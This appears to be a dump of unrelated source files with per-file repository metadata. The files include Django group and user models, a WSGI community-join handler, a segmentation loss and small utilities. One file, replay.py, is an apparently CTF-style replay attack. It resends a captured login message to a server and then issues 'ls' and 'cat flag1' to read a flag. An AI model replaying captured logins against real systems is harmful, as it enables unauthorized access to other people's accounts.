    """Create a community group under the given parent (parent id 0 means top level)."""
    parent_id = int(request.POST.get('group_parent_id'))
    new_group = Group()
    new_group.group_parent_id = parent_id
    new_group.group_name = request.POST.get('group_name')
    # Children sit one level below their parent; root groups are level 1.
    if parent_id != 0:
        new_group.group_level = Group.objects.get(group_id=parent_id).group_level + 1
    else:
        new_group.group_level = 1
    new_group.save()
    return HttpResponse(json.dumps({'status': 0, 'msg': 'ok', 'data': []}),
                        content_type='application/json')
# 获取项目组的审核人
@csrf_exempt
def groupauditors(request):
    """Return the configured auditors of a group, looked up by id or by name."""
    group_id = request.POST.get('group_id')
    group_name = request.POST.get('group_name')
    workflow_type = request.POST['workflow_type']
    result = {'status': 0, 'msg': 'ok', 'data': []}
    if not group_id and not group_name:
        result['status'] = 1
        result['msg'] = '参数错误'
        return HttpResponse(json.dumps(result), content_type='application/json')
    if not group_id:
        # Resolve the group id from its name.
        group_id = Group.objects.get(group_name=group_name).group_id
    auditors = workflowOb.auditsettings(group_id=int(group_id), workflow_type=workflow_type)
    # Auditors are stored as a comma-separated list of usernames.
    result['data'] = auditors.audit_users.split(',') if auditors else []
    return HttpResponse(json.dumps(result), content_type='application/json')
# 项目组审核配置
@csrf_exempt
@superuser_required
def changegroupauditors(request):
    """Update the audit-user configuration of a group for one workflow type."""
    result = {'status': 0, 'msg': 'ok', 'data': []}
    try:
        # Delegate the actual persistence to the workflow engine.
        workflowOb.changesettings(int(request.POST.get('group_id')),
                                  request.POST.get('workflow_type'),
                                  request.POST.get('audit_users'))
    except Exception as msg:
        result['status'] = 1
        result['msg'] = str(msg)
    return HttpResponse(json.dumps(result), content_type='application/json')
| 39.225859 | 122 | 0.641841 | 0 | 0 | 0 | 0 | 23,228 | 0.883227 | 0 | 0 | 7,723 | 0.293661 |
17f3d9a2300741cd7506a6c4460578d98121f0a5 | 154 | py | Python | gather/handlers/__init__.py | openghg/gather | 0096cfe66b0093cdd294fa2a67c060d7fc28d2fa | [
"Apache-2.0"
] | null | null | null | gather/handlers/__init__.py | openghg/gather | 0096cfe66b0093cdd294fa2a67c060d7fc28d2fa | [
"Apache-2.0"
] | null | null | null | gather/handlers/__init__.py | openghg/gather | 0096cfe66b0093cdd294fa2a67c060d7fc28d2fa | [
"Apache-2.0"
] | null | null | null | from ._scrape import scrape_handler
from ._binary_data import data_handler
from ._crds import crds_handler
__all__ = ["scrape_handler", "data_handler"]
| 22 | 44 | 0.811688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.194805 |
17f4968f43abac4e2306cd72253ba000d15a0329 | 49 | py | Python | bitswap/block_storage/__init__.py | VladislavSufyanov/py-bitswap | 875d15944e485c33b16af9965f24c1d85cb34c55 | [
"MIT"
] | null | null | null | bitswap/block_storage/__init__.py | VladislavSufyanov/py-bitswap | 875d15944e485c33b16af9965f24c1d85cb34c55 | [
"MIT"
] | null | null | null | bitswap/block_storage/__init__.py | VladislavSufyanov/py-bitswap | 875d15944e485c33b16af9965f24c1d85cb34c55 | [
"MIT"
] | null | null | null | from .base_block_storage import BaseBlockStorage
| 24.5 | 48 | 0.897959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17f57d12f28aa74c2e00b10a8b41523a0b884875 | 12,816 | py | Python | src/users/models.py | ofirr/OpenCommunity | 7786ac2996530af8f545f4398c071793c73634c8 | [
"BSD-3-Clause"
] | null | null | null | src/users/models.py | ofirr/OpenCommunity | 7786ac2996530af8f545f4398c071793c73634c8 | [
"BSD-3-Clause"
] | null | null | null | src/users/models.py | ofirr/OpenCommunity | 7786ac2996530af8f545f4398c071793c73634c8 | [
"BSD-3-Clause"
] | null | null | null | from django.conf import settings
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser, \
PermissionsMixin
from django.core.mail import send_mail
from django.db import models
from django.template.loader import render_to_string
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from issues.models import Proposal, ProposalVote, ProposalVoteValue, \
ProposalStatus
from meetings.models import MeetingParticipant
from users.default_roles import DefaultGroups
import datetime
import logging
import random
import string
CODE_LENGTH = 48
logger = logging.getLogger(__name__)
class OCUserManager(BaseUserManager):
    """Manager for OCUser: email-keyed lookups plus user/superuser creation."""

    @classmethod
    def normalize_email(cls, email):
        # Lower-case the whole address (BaseUserManager lower-cases only the domain).
        return email.lower()

    def get_by_natural_key(self, username):
        # Case-insensitive email lookup used by Django authentication.
        return self.get(email__iexact=username)

    def create_user(self, email, display_name=None, password=None, **kwargs):
        """
        Creates and saves a User with the given email, display name and
        password.
        """
        if not email:
            raise ValueError('Users must have an email address')
        if not display_name:
            # Fall back to the email address as the visible name.
            display_name = email
        user = self.model(
            email=OCUserManager.normalize_email(email),
            display_name=display_name,
            **kwargs
        )
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_superuser(self, email, display_name, password):
        """
        Creates and saves a superuser with the given email, display name and
        password.
        """
        user = self.create_user(email,
                                password=password,
                                display_name=display_name
                                )
        user.is_superuser = True
        user.is_staff = True
        user.save(using=self._db)
        return user
class OCUser(AbstractBaseUser, PermissionsMixin):
    """Custom user model identified by email address instead of a username."""

    # Unique login identifier; normalized to lower case by OCUserManager.
    email = models.EmailField(_('email address'), max_length=255, unique=True,
                              db_index=True,
                              )
    display_name = models.CharField(_("Your name"), max_length=200)
    is_active = models.BooleanField(default=True)
    # Controls access to the Django admin site.
    is_staff = models.BooleanField(_('staff status'), default=False,
                                   help_text=_('Designates whether the user can log into this admin '
                                               'site.'))
    date_joined = models.DateTimeField(_('date joined'), default=timezone.now)

    objects = OCUserManager()

    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = ['display_name']

    class Meta:
        verbose_name = _('user')
        verbose_name_plural = _('users')

    def __unicode__(self):
        return self.display_name

    def get_full_name(self):
        # The user is identified by their email address
        return self.display_name

    def get_short_name(self):
        # The user is identified by their email address
        return self.display_name

    def get_default_group(self, community):
        # Returns the user's default group name in *community*, or "" when
        # they are not a member.
        try:
            return self.memberships.get(community=community).default_group_name
        except Membership.DoesNotExist:
            return ""

    def email_user(self, subject, message, from_email=None):
        """
        Sends an email to this User.
        """
        send_mail(subject, message, from_email, [self.email])
class MembershipManager(models.Manager):
    """Queryset helpers splitting memberships into board vs. ordinary members."""

    # NOTE(review): get_query_set() is the pre-Django-1.6 spelling; a Django
    # upgrade would require renaming these calls to get_queryset().
    def board(self):
        # Members holding any role other than plain MEMBER.
        return self.get_query_set().exclude(
            default_group_name=DefaultGroups.MEMBER)

    def none_board(self):
        # Plain members only.
        return self.get_query_set().filter(
            default_group_name=DefaultGroups.MEMBER)
class Membership(models.Model):
    """A user's membership in a community, carrying their default permission group."""

    community = models.ForeignKey('communities.Community', verbose_name=_("Community"),
                                  related_name='memberships')
    user = models.ForeignKey(OCUser, verbose_name=_("User"),
                             related_name='memberships')
    default_group_name = models.CharField(_('Group'), max_length=50,
                                          choices=DefaultGroups.CHOICES)
    created_at = models.DateTimeField(auto_now_add=True,
                                      verbose_name=_("Created at"))
    invited_by = models.ForeignKey(settings.AUTH_USER_MODEL,
                                   verbose_name=_("Invited by"),
                                   related_name="members_invited", null=True,
                                   blank=True)
    # BUGFIX: pass the callable, not its result. ``datetime.date.today()`` was
    # evaluated once at import time, freezing the default to the date the
    # server process started; Django calls a callable default on every save.
    in_position_since = models.DateField(default=datetime.date.today,
                                         verbose_name=_("In position since"))

    objects = MembershipManager()

    class Meta:
        unique_together = (("community", "user"),)
        verbose_name = _("Community Member")
        verbose_name_plural = _("Community Members")

    def __unicode__(self):
        return "%s: %s (%s)" % (self.community.name, self.user.display_name,
                                self.get_default_group_name_display())

    @models.permalink
    def get_absolute_url(self):
        return "member_profile", (self.community.id, self.id)

    def get_permissions(self):
        # Permission set implied by the member's default group.
        return DefaultGroups.permissions[self.default_group_name]

    def total_meetings(self):
        """ In the future we'll check since joined to community or rejoined """
        return self.community.meetings.filter(held_at__gte=self.in_position_since).count()

    def meetings_participation(self):
        """ In the future we'll check since joined to community or rejoined """
        return MeetingParticipant.objects.filter(user=self.user, is_absent=False,
                                                 meeting__community=self.community,
                                                 meeting__held_at__gte=self.in_position_since).count()

    def meetings_participation_percantage(self):
        """ In the future we'll check since joined to community or rejoined """
        # NOTE(review): the misspelled name ("percantage") is kept because
        # external callers/templates may reference it. Division by zero is
        # possible when no meetings were held yet — confirm callers guard it.
        return round((float(self.meetings_participation()) / float(self.total_meetings())) * 100.0)

    def member_open_tasks(self, user=None, community=None):
        # Accepted, uncompleted tasks assigned to this member, excluding overdue
        # ones (those are reported by member_late_tasks).
        return Proposal.objects.object_access_control(
            user=user, community=community).filter(status=ProposalStatus.ACCEPTED, assigned_to_user=self.user, active=True, task_completed=False).exclude(due_by__lte=datetime.date.today())

    def member_close_tasks(self, user=None, community=None):
        """ Need to create a field to determine closed tasks """
        return Proposal.objects.object_access_control(
            user=user, community=community).filter(status=ProposalStatus.ACCEPTED, assigned_to_user=self.user, active=True, task_completed=True)

    def member_late_tasks(self, user=None, community=None):
        # Accepted, uncompleted tasks whose due date has already passed.
        return Proposal.objects.object_access_control(
            user=user, community=community).filter(status=ProposalStatus.ACCEPTED, assigned_to_user=self.user, due_by__lte=datetime.date.today(), active=True, task_completed=False)

    def member_votes_dict(self):
        """Group this member's recorded board votes by value and issue.

        Returns {'pro': {issue: [proposals]}, 'neut': {...}, 'con': {...},
        'pro_count': int, 'con_count': int, 'neut_count': int}.
        """
        res = {'pro': {}, 'neut': {}, 'con': {}}
        pro_count = 0
        con_count = 0
        neut_count = 0
        votes = self.user.board_votes.select_related('proposal') \
            .filter(proposal__issue__community_id=self.community_id,
                    proposal__register_board_votes=True,
                    proposal__active=True,
                    proposal__decided_at_meeting__held_at__gte=self.in_position_since) \
            .exclude(proposal__status=ProposalStatus.IN_DISCUSSION).order_by('-proposal__issue__created_at', 'proposal__id')
        for v in votes:
            if not v.proposal.register_board_votes:
                continue
            if v.value == ProposalVoteValue.NEUTRAL:
                key = 'neut'
                neut_count += 1
            elif v.value == ProposalVoteValue.PRO:
                key = 'pro'
                pro_count += 1
            elif v.value == ProposalVoteValue.CON:
                key = 'con'
                con_count += 1
            issue_key = v.proposal.issue
            p_list = res[key].setdefault(issue_key, [])
            p_list.append(v.proposal)
        res['pro_count'] = pro_count
        res['con_count'] = con_count
        res['neut_count'] = neut_count
        return res

    def _user_board_votes(self):
        # Base queryset shared by the member_proposal_* helpers below.
        return self.user.board_votes.select_related('proposal').filter(proposal__issue__community_id=self.community_id,
                                                                       proposal__active=True,
                                                                       proposal__register_board_votes=True,
                                                                       proposal__decided_at_meeting__held_at__gte=self.in_position_since)

    def member_proposal_pro_votes_accepted(self):
        return self._user_board_votes().filter(value=ProposalVoteValue.PRO,
                                               proposal__status=ProposalStatus.ACCEPTED)

    def member_proposal_con_votes_rejected(self):
        return self._user_board_votes().filter(value=ProposalVoteValue.CON,
                                               proposal__status=ProposalStatus.REJECTED)

    def member_proposal_nut_votes_accepted(self):
        return self._user_board_votes().filter(value=ProposalVoteValue.NEUTRAL,
                                               proposal__status=ProposalStatus.ACCEPTED)
CODE_CHARS = string.lowercase + string.digits
def create_code(length=CODE_LENGTH):
"""
Creates a random code of lowercase letters and numbers
"""
return "".join(random.choice(CODE_CHARS) for _x in xrange(length))
class EmailStatus(object):
PENDING = 0
SENT = 1
FAILED = 2
choices = (
(PENDING, _('Pending')),
(SENT, _('Sent')),
(FAILED, _('Failed')),
)
class Invitation(models.Model):
community = models.ForeignKey('communities.Community',
verbose_name=_("Community"),
related_name='invitations')
created_at = models.DateTimeField(auto_now_add=True, verbose_name=_("Created at"))
created_by = models.ForeignKey(settings.AUTH_USER_MODEL,
verbose_name=_("Created by"),
related_name="invitations_created")
name = models.CharField(_("Name"), max_length=200, null=True, blank=True)
email = models.EmailField(_("Email"))
message = models.TextField(_("Message"), null=True, blank=True)
code = models.CharField(max_length=CODE_LENGTH, default=create_code)
user = models.ForeignKey(OCUser, verbose_name=_("User"),
related_name='invitations', null=True, blank=True)
default_group_name = models.CharField(_('Group'), max_length=50,
choices=DefaultGroups.CHOICES)
status = models.PositiveIntegerField(_("Status"),
choices=EmailStatus.choices, default=EmailStatus.PENDING)
times_sent = models.PositiveIntegerField(_("Times Sent"), default=0)
error_count = models.PositiveIntegerField(_("Error count"), default=0)
last_sent_at = models.DateTimeField(_("Sent at"), null=True, blank=True)
class Meta:
unique_together = (("community", "email"),)
verbose_name = _("Invitation")
verbose_name_plural = _("Invitations")
DEFAULT_MESSAGE = _("The system will allow you to take part in the decision making process of %s. "
"Once you've joined, you'll be able to see the topics for the agenda in the upcoming meeting, decisions at previous meetings, and in the near future you'll be able to discuss and influence them.")
def __unicode__(self):
return "%s: %s (%s)" % (self.community.name, self.email,
self.get_default_group_name_display())
@models.permalink
def get_absolute_url(self):
return "accept_invitation", (self.code,)
def send(self, sender, recipient_name='', base_url=None):
if not base_url:
base_url = settings.HOST_URL
subject = _("Invitation to %s") % self.community.name
d = {
'base_url': base_url,
'object': self,
'recipient_name': recipient_name,
}
message = render_to_string("emails/invitation.txt", d)
recipient_list = [self.email]
from_email = "%s <%s>" % (self.community.name, settings.FROM_EMAIL)
self.last_sent_at = timezone.now()
try:
send_mail(subject, message, from_email, recipient_list)
self.times_sent += 1
self.status = EmailStatus.SENT
self.save()
return True
except:
logger.error("Invitation email sending failed", exc_info=True)
self.error_count += 1
self.status = EmailStatus.FAILED
self.save()
return False
| 39.073171 | 220 | 0.628277 | 11,928 | 0.930712 | 0 | 0 | 287 | 0.022394 | 0 | 0 | 1,905 | 0.148642 |
17f74407f6071edec00f6d7cb2950f3675cc7079 | 881 | py | Python | src/hyperloop/Python/tests/test_magnetic_drag.py | jcchin/Hyperloop_v2 | 73861d2207af8738425c1d484909ed0433b9653f | [
"Apache-2.0"
] | 1 | 2021-04-29T00:23:03.000Z | 2021-04-29T00:23:03.000Z | src/hyperloop/Python/tests/test_magnetic_drag.py | jcchin/Hyperloop_v2 | 73861d2207af8738425c1d484909ed0433b9653f | [
"Apache-2.0"
] | 9 | 2016-11-23T09:10:34.000Z | 2016-12-06T01:10:09.000Z | src/hyperloop/Python/tests/test_magnetic_drag.py | jcchin/Hyperloop_v2 | 73861d2207af8738425c1d484909ed0433b9653f | [
"Apache-2.0"
] | 11 | 2016-01-19T20:26:35.000Z | 2021-02-13T11:16:20.000Z | """
Test for magnetic_drag.py. Uses test values and outputs given by
the laminated sheet experiment in [1].
"""
import pytest
from hyperloop.Python.pod.magnetic_levitation.magnetic_drag import MagDrag
import numpy as np
from openmdao.api import Group, Problem
def create_problem(magdrag):
root = Group()
prob = Problem(root)
prob.root.add('comp', magdrag)
return prob
class TestVac(object):
def test_case1_vs_breakpoint(self):
magdrag = MagDrag()
prob = create_problem(magdrag)
prob.setup()
prob['comp.vel'] = 23
prob['comp.track_res'] = 0.019269
prob['comp.track_ind'] = 3.59023e-6
prob['comp.pod_weight'] = 29430.0
prob['comp.lam'] = 0.125658
prob.run()
print('magdrag is %f' % prob['comp.mag_drag'])
assert np.isclose(prob['comp.mag_drag'], 137342.0, rtol=.001)
| 25.171429 | 74 | 0.651532 | 493 | 0.559591 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.262202 |
17f88b1dc4e1fbbf2f002412f515f2e67a8d0b31 | 494 | py | Python | back_end/dosage_dao.py | claire-sivan/pharmaceticual_web_based_app | 42c79aa6f95e220d296fb3e97b58edd08a90010e | [
"Apache-2.0"
] | null | null | null | back_end/dosage_dao.py | claire-sivan/pharmaceticual_web_based_app | 42c79aa6f95e220d296fb3e97b58edd08a90010e | [
"Apache-2.0"
] | null | null | null | back_end/dosage_dao.py | claire-sivan/pharmaceticual_web_based_app | 42c79aa6f95e220d296fb3e97b58edd08a90010e | [
"Apache-2.0"
] | null | null | null | def get_dosages(connection):
cursor = connection.cursor()
query = ("SELECT * from dosage")
cursor.execute(query)
response = []
for (dosage_id, dosage_name) in cursor:
response.append({
'dosage_id': dosage_id,
'dosage_name': dosage_name
})
return response
if __name__ == '__main__':
from sql_connection import get_sql_connection
connection = get_sql_connection()
print(get_dosages(connection))
| 23.52381 | 50 | 0.619433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.11336 |
17f8d13aa79ddcb1c6a85761d81131671d95cb65 | 4,681 | py | Python | mmseg/models/losses/tversky_loss.py | yunchu/mmsegmentation | 404f3e0e8859991931b6a39a583de412348e98f0 | [
"Apache-2.0"
] | 3 | 2021-12-21T07:25:13.000Z | 2022-02-07T01:59:19.000Z | mmseg/models/losses/tversky_loss.py | yunchu/mmsegmentation | 404f3e0e8859991931b6a39a583de412348e98f0 | [
"Apache-2.0"
] | 13 | 2021-12-10T15:08:56.000Z | 2022-03-23T08:58:03.000Z | mmseg/models/losses/tversky_loss.py | yunchu/mmsegmentation | 404f3e0e8859991931b6a39a583de412348e98f0 | [
"Apache-2.0"
] | 3 | 2021-11-11T23:16:51.000Z | 2021-12-08T23:49:29.000Z | # Copyright (C) 2018-2021 kornia
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
"""Modified from https://kornia.readthedocs.io/en/v0.1.2/_modules/torchgeometry/losses/tversky.html"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..builder import LOSSES
from .utils import get_class_weight
def tversky_loss(pred,
target,
valid_mask,
alpha,
beta,
eps=1e-6,
class_weight=None,
reduction='mean',
avg_factor=None,
ignore_index=255,
**kwargs):
assert pred.shape[0] == target.shape[0]
num_classes = pred.shape[1]
if num_classes == 1:
class_ids = [0] if ignore_index != 0 else []
elif num_classes == 2:
class_ids = [1] if ignore_index != 1 else []
else:
class_ids = [i for i in range(num_classes) if i != ignore_index]
assert len(class_ids) >= 1
class_losses = []
for i in class_ids:
tversky_loss_value = binary_tversky_loss(
pred[:, i],
target[..., i],
valid_mask=valid_mask,
alpha=alpha,
beta=beta,
eps=eps,
)
if class_weight is not None:
tversky_loss_value *= class_weight[i]
class_losses.append(tversky_loss_value)
if avg_factor is None:
if reduction == 'mean':
loss = sum(class_losses) / float(len(class_losses))
elif reduction == 'sum':
loss = sum(class_losses)
elif reduction == 'none':
loss = class_losses
else:
raise ValueError(f'unknown reduction type: {reduction}')
else:
if reduction == 'mean':
loss = sum(class_losses) / avg_factor
elif reduction != 'none':
raise ValueError('avg_factor can not be used with reduction="sum"')
return loss
def binary_tversky_loss(pred, target, valid_mask, alpha, beta, eps=1e-6):
assert pred.shape[0] == target.shape[0]
pred = pred.reshape(pred.shape[0], -1)
target = target.reshape(target.shape[0], -1)
valid_mask = valid_mask.reshape(valid_mask.shape[0], -1)
valid_pred = torch.mul(pred, valid_mask)
valid_target = torch.mul(target, valid_mask)
intersection = torch.sum(valid_pred * valid_target, dim=1)
fps = torch.sum(valid_pred * (1.0 - valid_target), dim=1)
fns = torch.sum((1.0 - valid_pred) * valid_target, dim=1)
numerator = intersection
denominator = intersection + alpha * fps + beta * fns
return 1.0 - numerator / (denominator + eps)
@LOSSES.register_module()
class TverskyLoss(nn.Module):
"""TverskyLoss.
This loss is proposed in `Tversky loss function for image segmentation
using 3D fully convolutional deep networks <https://arxiv.org/abs/1706.05721>`_.
"""
def __init__(self,
alpha=0.3,
beta=0.7,
eps=1e-6,
reduction='mean',
class_weight=None,
loss_weight=1.0):
super(TverskyLoss, self).__init__()
self.alpha = alpha
self.beta = beta
self.eps = eps
self.reduction = reduction
self.class_weight = get_class_weight(class_weight)
self.loss_weight = loss_weight
@property
def name(self):
return 'tversky'
def forward(self,
pred,
target,
avg_factor=None,
reduction_override=None,
ignore_index=255,
**kwargs):
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if self.class_weight is not None:
class_weight = pred.new_tensor(self.class_weight)
else:
class_weight = None
pred = F.softmax(pred, dim=1)
num_classes = pred.shape[1]
one_hot_target = F.one_hot(
torch.clamp(target.long(), 0, num_classes - 1),
num_classes=num_classes
)
valid_mask = (target != ignore_index).long()
loss = self.loss_weight * tversky_loss(
pred,
one_hot_target,
valid_mask=valid_mask,
alpha=self.alpha,
beta=self.beta,
eps=self.eps,
class_weight=class_weight,
reduction=reduction,
avg_factor=avg_factor,
ignore_index=ignore_index,
**kwargs
)
return loss
| 29.074534 | 102 | 0.574877 | 1,931 | 0.412519 | 0 | 0 | 1,957 | 0.418073 | 0 | 0 | 586 | 0.125187 |
17fa046b5f198637f7b0c78962349041958e3fcc | 689 | py | Python | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | null | null | null | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | 1 | 2015-12-03T06:16:53.000Z | 2015-12-03T06:16:53.000Z | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | null | null | null | import socket
import config
def main():
# get the login info, which is extracted from the packet
f = open('data/msg.txt', 'r')
msg = f.read()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (config.HOST, config.PORT)
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
sock.sendall(msg) # replay login message
sock.sendall('ls\r\n') # to list the file
sock.sendall('cat flag1\r\n') # to get flag1
# send login
while True:
data = sock.recv(1024)
if data:
print data
print 'Close the socket!'
sock.close()
if __name__ == '__main__':
main()
| 22.966667 | 60 | 0.625544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 217 | 0.314949 |
17fa9c27681a820d868dd4675d7bac62973724aa | 424 | py | Python | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | 1 | 2016-09-14T16:33:03.000Z | 2016-09-14T16:33:03.000Z | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | null | null | null | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | null | null | null | import jtweeter
access_token = "TWITTER_APP_ACCESS_TOKEN"
access_token_secret = "TWITTER_APP_ACCESS_TOKEN_SECRET"
consumer_key = "TWITTER_APP_CONSUMER_KEY"
consumer_secret = "TWITTER_APP_CONSUMER_SECRET"
user_id = 000000000 #user id of twitter user to simulate.
def main():
jtweeter.tweet(access_token, access_token_secret, consumer_key, consumer_secret, user_id)
if __name__ == '__main__':
main() | 32.615385 | 94 | 0.778302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 162 | 0.382075 |
17fb4e69ff797bf18a8170242cc925a7284334e8 | 4,899 | wsgi | Python | backend/api/user/join.wsgi | pstrinkle/popflip-image-stream | 6cf1fe649ac53a91d913d1cf47cd9ec2f22765db | [
"Apache-2.0"
] | null | null | null | backend/api/user/join.wsgi | pstrinkle/popflip-image-stream | 6cf1fe649ac53a91d913d1cf47cd9ec2f22765db | [
"Apache-2.0"
] | null | null | null | backend/api/user/join.wsgi | pstrinkle/popflip-image-stream | 6cf1fe649ac53a91d913d1cf47cd9ec2f22765db | [
"Apache-2.0"
] | null | null | null | """Join API Handler."""
from pymongo import Connection
from pymongo.errors import InvalidId
from bson.objectid import ObjectId
from cgi import escape
from urlparse import parse_qs
from json import dumps
from urllib import unquote
POST_REQUIRED_PARAMS = ("user", "community",)
MAX_COMMUNITIES = 25
# XXX: Move into neato library.
def string_from_interwebs(input_value):
"""Given a string from the query dictionary string thing; make it clean."""
return escape(unquote(input_value))
# db.users.update({"_id" : ObjectId("4ffb168d5e358e377900000a")},
# { $set : {"watched" : 0} },
# false,
# false)
def update_involved(user, connection):
"""Increment the communities value for the user."""
database = connection['test']
collection = database['users']
collection.update({"_id" : ObjectId(user)},
{"$inc" : {"communities" : 1}})
return
def check_duplicate_community(user, community, connection):
"""User is the user id string and community will be the array."""
database = connection['test']
collection = database['communities']
try:
post = collection.find_one({"$and" : [{"user" : ObjectId(user)},
{"community" : community}]})
except InvalidId:
post = None
if post is None:
return False
return True
# XXX: Using separate connections may just be stupid and slow.
def check_count(user, connection):
"""Given an author id, check to make sure it has fewer than MAX watches."""
database = connection['test']
collection = database['users']
post = collection.find_one({"_id" : ObjectId(user)})
if post["communities"] >= MAX_COMMUNITIES:
return True
return False
# XXX: Use this information with check_count()
def verify_author(user, connection):
"""Given an author id, check it."""
database = connection['test']
collection = database['users']
try:
post_a = collection.find_one({"_id" : ObjectId(user)})
except InvalidId:
post_a = None
if post_a is None:
return False
return True
def handle_new_community(post_data):
"""Add new community to database if input is correct."""
# likely throws an exception on parse error.
query_dict = parse_qs(post_data, keep_blank_values=True)
for required in POST_REQUIRED_PARAMS:
if required not in query_dict:
return None
user = string_from_interwebs(query_dict.get("user")[0]).strip()
community = string_from_interwebs(query_dict.get("community")[0]).strip()
# temporary
split_tags = [string_from_interwebs(tag).strip() for tag in community.split(",")]
# XXX: Need to search each tag for illegal characters and also check the
# string length.
if len(split_tags) > 2:
return None
if split_tags[0] == split_tags[1]:
return None
with Connection('localhost', 27017) as connection:
if not verify_author(user, connection):
return None
if check_count(user, connection):
return None
if check_duplicate_community(user, split_tags, connection):
return None
comm_link = {"user" : ObjectId(user), "community" : split_tags}
database = connection['test']
collection = database['communities']
# need to wrap with try, except
entry = collection.insert(comm_link)
update_involved(user, connection)
return {"id" : str(entry)}
def bad_request(start_response):
"""Just does the same thing, over and over -- returns bad results.."""
output_len = 0
start_response('400 Bad Request',
[('Content-type', 'text/html'),
('Content-Length', str(output_len))])
def application(environ, start_response):
"""wsgi entry point."""
output = []
outtype = "application/json"
if environ['REQUEST_METHOD'] == 'GET':
bad_request(start_response)
return output
# this simplifies parameter parsing.
if environ['CONTENT_TYPE'] == 'application/x-www-form-urlencoded':
try:
content_length = int(environ['CONTENT_LENGTH'])
except ValueError:
content_length = 0
# show form data as received by POST:
post_data = environ['wsgi.input'].read(content_length)
entry = handle_new_community(post_data)
if entry is None:
bad_request(start_response)
return output
output.append(dumps(entry, indent=4))
# send results
output_len = sum(len(line) for line in output)
start_response('200 OK',
[('Content-type', outtype),
('Content-Length', str(output_len))])
return output
| 28.649123 | 85 | 0.62176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,460 | 0.29802 |
17ff2992920f5d3aa7bc1487f1b72ff34fcce309 | 1,040 | py | Python | nobeldb/cli.py | ionrock/nobeldb | d8d59c8b8f9c2a2acd4a046f642f2f2021255a40 | [
"BSD-3-Clause"
] | null | null | null | nobeldb/cli.py | ionrock/nobeldb | d8d59c8b8f9c2a2acd4a046f642f2f2021255a40 | [
"BSD-3-Clause"
] | null | null | null | nobeldb/cli.py | ionrock/nobeldb | d8d59c8b8f9c2a2acd4a046f642f2f2021255a40 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import csv
import pkg_resources
import textwrap
import click
from tabulate import tabulate
default_data = pkg_resources.resource_filename('nobeldb', 'data/nobel.csv')
def reader(fh):
rows = csv.DictReader(fh)
for row in rows:
yield {k: v.decode('latin-1') for k, v in row.iteritems()}
@click.command()
@click.argument('needle')
@click.option('--db', '-d', default=default_data, type=click.File('rb'))
def main(needle, db):
rows = []
cols = ['Year', 'Name', 'Category', 'Motivation']
for winner in reader(db):
if winner['Name'].lower().startswith(needle.lower()):
row = [winner['Year'], winner['Name'], winner['Category']]
motivation = textwrap.wrap(winner['Motivation'], 30)
row.append(motivation[0])
rows.append(row)
for chunk in motivation[1:]:
rows.append(['', '', '', chunk])
rows.append(['', '', '', ''])
click.echo(tabulate(rows))
if __name__ == '__main__':
main()
| 24.186047 | 75 | 0.590385 | 0 | 0 | 133 | 0.127885 | 667 | 0.641346 | 0 | 0 | 177 | 0.170192 |
aa002b09eecbf2efa6db3d5394d8eb8190eee611 | 2,359 | py | Python | gnome/global_eigenvector/script.py | imlegend19/MDSN-DevRank | bb1b71f72d2fb97044a62e8e0152dadb88de6411 | [
"MIT"
] | null | null | null | gnome/global_eigenvector/script.py | imlegend19/MDSN-DevRank | bb1b71f72d2fb97044a62e8e0152dadb88de6411 | [
"MIT"
] | null | null | null | gnome/global_eigenvector/script.py | imlegend19/MDSN-DevRank | bb1b71f72d2fb97044a62e8e0152dadb88de6411 | [
"MIT"
] | null | null | null | import pickle
import numpy as np
def fetch_file(path):
with open(path, 'rb') as fp:
return pickle.load(fp)
def fetch_adj_mat(column):
if column == 0:
return A1
elif column == 1:
return A2
elif column == 2:
return A3
# elif column == 3:
# return A4
print("Fetching files...")
A1 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
A2 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
A3 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
# A4 = np.array(fetch_file(RELATIVE_PATH + ADJACENCY_MATRIX + "A4_fc.txt"))
influence_matrix = np.array(fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/influence_matrix_normal/definition_2/"
"influence_matrix_fc.txt"))
print(influence_matrix.shape)
krp = []
for i in range(3):
wa1 = A1 * influence_matrix[i][0]
wa2 = A2 * influence_matrix[i][1]
wa3 = A3 * influence_matrix[i][2]
# wa4 = A4 * influence_matrix_normal[i][3]
print(influence_matrix[i][0])
print(influence_matrix[i][1])
print(influence_matrix[i][2])
# print(influence_matrix_normal[i][3])
for j in range(1134):
row = []
row.extend(wa1[j])
